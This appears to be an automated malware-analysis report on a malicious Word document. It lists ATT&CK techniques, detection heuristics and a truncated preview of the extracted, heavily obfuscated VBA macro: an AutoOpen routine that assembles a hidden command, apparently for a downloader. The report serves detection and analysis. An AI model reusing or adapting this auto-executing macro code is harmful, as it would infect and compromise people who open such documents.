Verdict: MALICIOUS (Risk Score: 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and the critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The presence of the 'Doc.Downloader' ClamAV detection further supports this. The macro itself is heavily obfuscated, preventing a more detailed analysis of its specific actions.
Heuristics (6)

- ClamAV: Doc.Downloader.00536d-6697990-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.00536d-6697990-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 87190 bytes | 8f53abf5963a270636de0195cb88bb0b87ed8533d2987286bd3cb6b697d061f8 |

Preview script: first 1,000 lines of the extracted script (truncated in this report).

```vba
Attribute VB_Name = "XjfLisDjucS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim LiHOou(1)
LiHOou(0) = Mid(UafDKY + ZZDrUlncEhwjZXsjZtQ + koPjaj, 924, 20) + MidB(riQRJavX + NljuDAArwjJPhVDJvHjA + pOljGdW, 581, 498) + MidB(HUjafiJw + SjJcEsNcjktMNlPVNfpYIZ + jQdXBc, 2, 441) + Mid(GBlInzb + ISoPvXzCdKADDZwJjRMq + ckkErrzu, 232, 849)
Dim YAAwfA(1)
YAAwfA(0) = Mid(cqNBUinK + GOzNIWMGDQZfkWohNpJE + ZfzDou, 640, 259) + Left(BqKsij + ZYCLdfJzdIGzrjqNC + iMlQU, 413) + Right(DdQbfRTN + uhvEFnqiTInVPpqZM + vCZipWiq, 460) + Left(tIwNiGzt + snPIvWPbopKHlsizMrvnzcN + LjbTf, 11)
kWOmnIjtktpw (KeyString(iAYfz + bCzQiO + 9 + 14 + 44 + ivwbic + stLlNFrL) + ZQJKmOz + ZmUZd + KeyString(PQwcLYP + mmIIVLl + 10 + 16 + 51 + piJUJhiw + AYTisipb) + dSEYjani + ElNhAZ + tDsPmEqKVsi + jlLhSYdjl + qUTzAhjPhjp + wMJmzkP + iaWKjaaLVBw + LVdUUMkFd + WuzOP + wjALUzf)
Dim RvwAPf(2)
RvwAPf(0) = MidB(NPsMWi + iUFDAzcGAtMwEcZOF + uqLkBz, 55, 398) + Mid(udqfa + USwuOmWSEokzQBbOsPwcz + oSTqfd, 621, 599)
RvwAPf(1) = Left(JTfDpRU + kiosBaLDiYpqwEzq + ESWOS, 934) + MidB(Czbhi + zZSPZRcAwKKpFlWEjMRii + AAjwIQ, 154, 928) + MidB(jbzsbRC + mDFRiKiUhhvjlbUXotC + GlCXL, 94, 904) + Mid(arJvj + zmnPRjwpbzzidOkKsvnSQ + jJtCVs, 353, 477)
Dim TtqDT(1)
TtqDT(0) = MidB(SOYiTpd + SbhuzTSoNUbczENmzwLkc + IvujUT, 437, 237) + MidB(RwQAaMPF + pPUXirdlGrFJWjEsB + aGtmzl, 426, 690)
Dim iXXdWt(2)
iXXdWt(0) = MidB(KECczWzv + wVoTmNMfzMBHsojSRFHM + BEIYlJn, 77, 990) + Mid(lKlJR + kdJwKAVPcPnpIBJEHZpZz + TqdwJzPZ, 545, 167)
iXXdWt(1) = Right(uHDDu + LIzkiAANJvELoOhQTPYQ + DjOwEVuO, 163) + MidB(TGzzImjP + RQfZYdrZnrTqaQinApDr + XFTKcs, 6, 972) + Left(PiWfWQX + vAPYcWBcjPOMBuKj + rVCpFCtw, 339) + Mid(UhfNHj + GrYRZWqiibGqmfNjXU + Kwzur, 489, 987)
Dim tjbtbW(1)
tjbtbW(0) = Mid(bsaRGLpk + cKMjvoNiviFKMMZE + NDAaMpJz, 655, 957) + Mid(SHmRNnBE + FNVlYHuzjXIPGMjfNwzSJ + YvzlDNjV, 959, 743) + Left(RBFiijZ + fEGERZAvuMvdjddJbt + BISiIN, 284) + Mid(fCsqshl + ZprsfnRiECPhiFvzus + IbPbrIIv, 840, 411)
Dim PioWp(2)
PioWp(0) = MidB(kFzlhLH + YIDKTWczmvkFHnHUfK + hDiKo, 621, 27) + Right(DaTJUfn + pWCRzwSjuDmTEWGlMoT + JjinVkHT, 547) + Left(RBQEDM + GuzkqEwZCfNWHSAKzv + KoOSDFC, 653) + Mid(SstKwo + liRwRznIlDBYEUvbQBsWUf + iUzWL, 123, 629)
PioWp(1) = Mid(SNXPY + QizuOXiVNoPsLWwPTLP + rvQsaXMr, 732, 920) + MidB(jAoGlbWz + QsVwBSvlBmEHqvcBw + GHkVHIik, 870, 883)
Dim TiJdf(2)
TiJdf(0) = Mid(iJjVz + LnmmtovjRPLazatmiDw + TiqDkY, 121, 346) + MidB(zVJFbH + wsOTlDAYbLarUSKzo + KzpEA, 103, 998)
TiJdf(1) = MidB(fBfwDD + mwjziGwEdomRJoNQijDzAS + YlQnRSM, 204, 793) + MidB(fqsAS + SAVNSWmVRjhVaYTRq + EzzlcB, 502, 736)
End Sub
Attribute VB_Name = "XpzIKKTGQiwv"
Function dSEYjani()
QGhAKfV = "d \/ // //" + "// / \ / /V:" + "O/C" + """" + "set ]}*~=027a 0" + "72a 07a2 0a72 207"
ZiKwMnYW = "a 2a70 0a72 270a" + " 72a0 7a02 a" + "027 a207 02"
Dim jqzRY(1)
jqzRY(0) = MidB(tQiQXv + COZOzUwvOSWwXoiiun + CtiHaoHO, 488, 205) + Left(NQNZEMuC + GSWRGpNrPBWWwuHnzt + YlGaJd, 653)
Dim iREfn(2)
iREfn(0) = Right(YwBqjd + AmktXivcbWUGncpsK + YSjAZKiX, 742) + Right(YZbroTj + cEQTOiONtlJYLOWEJRE + liQfw, 777) + Right(AaNUB + rSPJtZYNMYbwcAEFijSMS + ZJwwuR, 3) + MidB(qBuvm + CSXNZjzpEviFZkVzOBPRH + PKCdT, 374, 409)
iREfn(1) = Mid(tvMwqK + pVVinEKamzhmmMToTM + JHJMCYX, 172, 83) + MidB(clFhb + StjXQdsilWVJwEWiYCm + tIfYiji, 851, 298) + Left(qvmqfTXw + iPKXttKBvfqDdIwsGiGnCOz + wEfoRrL, 870) + Right(lnTvO + zsIihzFiIcbHTiwwQrZM + dSOFmj, 847)
Dim ownPlI(2)
ownPlI(0) = MidB(ZMTGzqu + ISnODpuwjAkJXCiZh + lZHZh, 940, 344) + Mid(MhAVPFjl + UmchdubKuIULGwjdiscX + ViOtSTzp, 690, 634)
ownPlI(1) = Left(rifFm + msVuYjqHFErOquNRRaLi + XXWczZ, 126) + MidB(zvAkqJbq + fpJSwWQVRFaNtUAAJfzzY + HfWHpkWu, 931, 703) + MidB(aFhhl + YhGPpzHfEhrlbzPNbVESw + HtvcwMV, 761, 356) + MidB(PjKiv + OtcdcqwLAPUPKjNuDFVVwI + VoDtZO, 539, 649)
Dim uZlXQ(1)
uZlXQ(0) = MidB(YtbYSw ... (truncated)
```